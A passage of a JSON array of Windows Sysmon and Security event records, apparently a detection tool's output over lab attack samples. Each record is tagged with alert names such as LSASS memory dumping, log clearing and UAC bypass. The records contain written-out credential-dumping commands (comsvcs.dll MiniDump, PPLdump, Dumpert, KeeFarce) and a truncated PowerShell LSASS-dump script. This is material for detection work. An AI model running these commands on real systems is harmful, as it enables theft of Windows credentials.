Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 
12:54:07.823"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32151,"Execution":{"#attributes":{"ProcessID":3292,"ThreadID":928}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-30T12:54:07.873789Z"}},"Version":5}}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A","Image":"C:\\Windows\\System32\\cscript.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-08-30 12:54:08.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":32153,"Execution":{"#attributes":{"ProcessID":3292,"ThreadID":4120}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-30T12:54:08.257123Z"}},"Version":3}}}},{"detection":["Process Dump via Comsvcs 
DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 4868 C:\\Windows\\System32\\notepad.bin full","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-1C70-5D69-0000-0010D4551F00","ParentProcessId":1144,"ProcessGuid":"747F3D96-1C70-5D69-0000-0010C9661F00","ProcessId":2888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:08.331"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32154,"Execution":{"#attributes":{"ProcessID":3292,"ThreadID":928}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-30T12:54:08.354049Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":887106,"Execution":{"#attributes":{"ProcessID":8,"ThreadID":6640}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-22T20:29:27.321769Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x3a17a","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["LSASS Memory Dumping"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"PPLdump.exe -v lsass lsass.dmp","Company":"?","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"?","FileVersion":"?","Hashes":"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74","Image":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-EFC5-6081-0000-00203ACE0B00","LogonId":"0xbce3a","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F040-6081-0000-001046AC1B00","ParentProcessId":4864,"ProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ProcessId":6316,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-04-22 
22:09:25.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564589,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:25.389633Z"}},"Version":5}}}},{"detection":["Windows Processes Suspicious Parent Directory","LSASS Memory Dumping"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"Services and Controller app","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204","Image":"C:\\Windows\\System32\\services.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E19-6082-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"services.exe","ParentCommandLine":"PPLdump.exe -v lsass lsass.dmp","ParentImage":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","ParentProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ParentProcessId":6316,"ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-22 
22:09:26.016"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564593,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:26.081337Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","CreateMiniDump Hacktool"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-04-22 22:09:26.157","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.dmp","UtcTime":"2021-04-22 22:09:26.157"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":564596,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:26.163007Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s 
fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E1A-6082-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":624,"ProcessGuid":"747F3D96-F41F-6081-0000-001078834A00","ProcessId":6644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-22 22:09:35.263"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564605,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:35.284225Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-09-28 
12:47:36.624","Image":"C:\\WINDOWS\\system32\\rdrleakdiag.exe","ProcessGuid":"BC47D85C-DB68-5F71-0000-0010B237AB01","ProcessId":3352,"RuleName":"","TargetFilename":"C:\\Users\\wanwan\\Desktop\\minidump_668.dmp","UtcTime":"2020-09-28 12:47:36.624"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-PIU87N6","Correlation":null,"EventID":11,"EventRecordID":5229,"Execution":{"#attributes":{"ProcessID":2848,"ThreadID":2328}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-28T12:47:36.630448Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198238040,"Execution":{"#attributes":{"ProcessID":744,"ThreadID":2028}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-25T09:09:14.916619Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"}}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":769792,"Execution":{"#attributes":{"ProcessID":264,"ThreadID":7672}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-17T10:57:37.013214Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"KeeFarce.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40","Image":"C:\\Users\\Public\\KeeFarce.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A19B-5CC4-0000-0020A8FF0000","LogonId":"0xffa8","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-A22D-5CC4-0000-0010E2830900","ParentProcessId":3680,"ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"technique_id=T1036,technique_name=Masquerading","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-27 
18:47:00.046"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7020,"Execution":{"#attributes":{"ProcessID":1816,"ThreadID":1228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T18:47:00.046849Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747","Image":"C:\\Users\\Public\\KeeFarce.exe","ImageLoaded":"C:\\Users\\Public\\BootstrapDLL.dll","ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"creddump - keefarce HKTL","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-04-27 18:47:00.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7022,"Execution":{"#attributes":{"ProcessID":1816,"ThreadID":1228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T18:47:00.062474Z"}},"Version":3}}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File 
Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Users\\administrator\\Desktop\\x64\\Outflank-Dumpert.exe","ProcessGuid":"ECAD0485-88C9-5D0C-0000-0010348C1D00","ProcessId":3572,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:37.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238375,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:35:37.329185Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.258"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238380,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:35:50.259077Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS 
Memory Dump File Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238383,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:35:50.729226Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 07:36:50.985","Image":"C:\\Users\\administrator\\Desktop\\AndrewSpecial.exe","ProcessGuid":"ECAD0485-8912-5D0C-0000-0010FD2F1F00","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\Desktop\\Andrew.dmp","UtcTime":"2019-06-21 
07:36:50.985"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238387,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:36:51.681567Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Version","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5589,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Name","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5590,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE4755D1CB0002A410","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Id","UtcTime":"2019-03-17 
20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5591,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\MostRecentStart","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5592,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["Accessing WinAPI in PowerShell","Malicious PowerShell Keywords","PowerShell Get-Process LSASS in 
ScriptBlock"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"C:\\Users\\Public\\lsass_wer_ps.ps1","ScriptBlockId":"27f08bda-c330-419f-b83b-eb5c0f699930","ScriptBlockText":"function Memory($path)\r\n{\r\n\t\t\t \r\n\t\t\t \r\n\t\t$Process = Get-Process lsass\r\n\t\t$DumpFilePath = $path\r\n\t\t\r\n\t\t$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\r\n\t\t$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\r\n\t\t$Flags = [Reflection.BindingFlags] 'NonPublic, Static'\r\n\t\t$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\r\n\t\t$MiniDumpWithFullMemory = [UInt32] 2\r\n\t\r\n\t\t\t\r\n\t\t\t #\r\n\t\t$ProcessId = $Process.Id\r\n\t\t$ProcessName = $Process.Name\r\n\t\t$ProcessHandle = $Process.Handle\r\n\t\t$ProcessFileName = \"$($ProcessName).dmp\"\r\n\t\t\r\n\t\t$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName\r\n\t\t\r\n\t\t$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\r\n\t\t\t \r\n\t\t$Result = $MiniDumpWriteDump.Invoke($null, 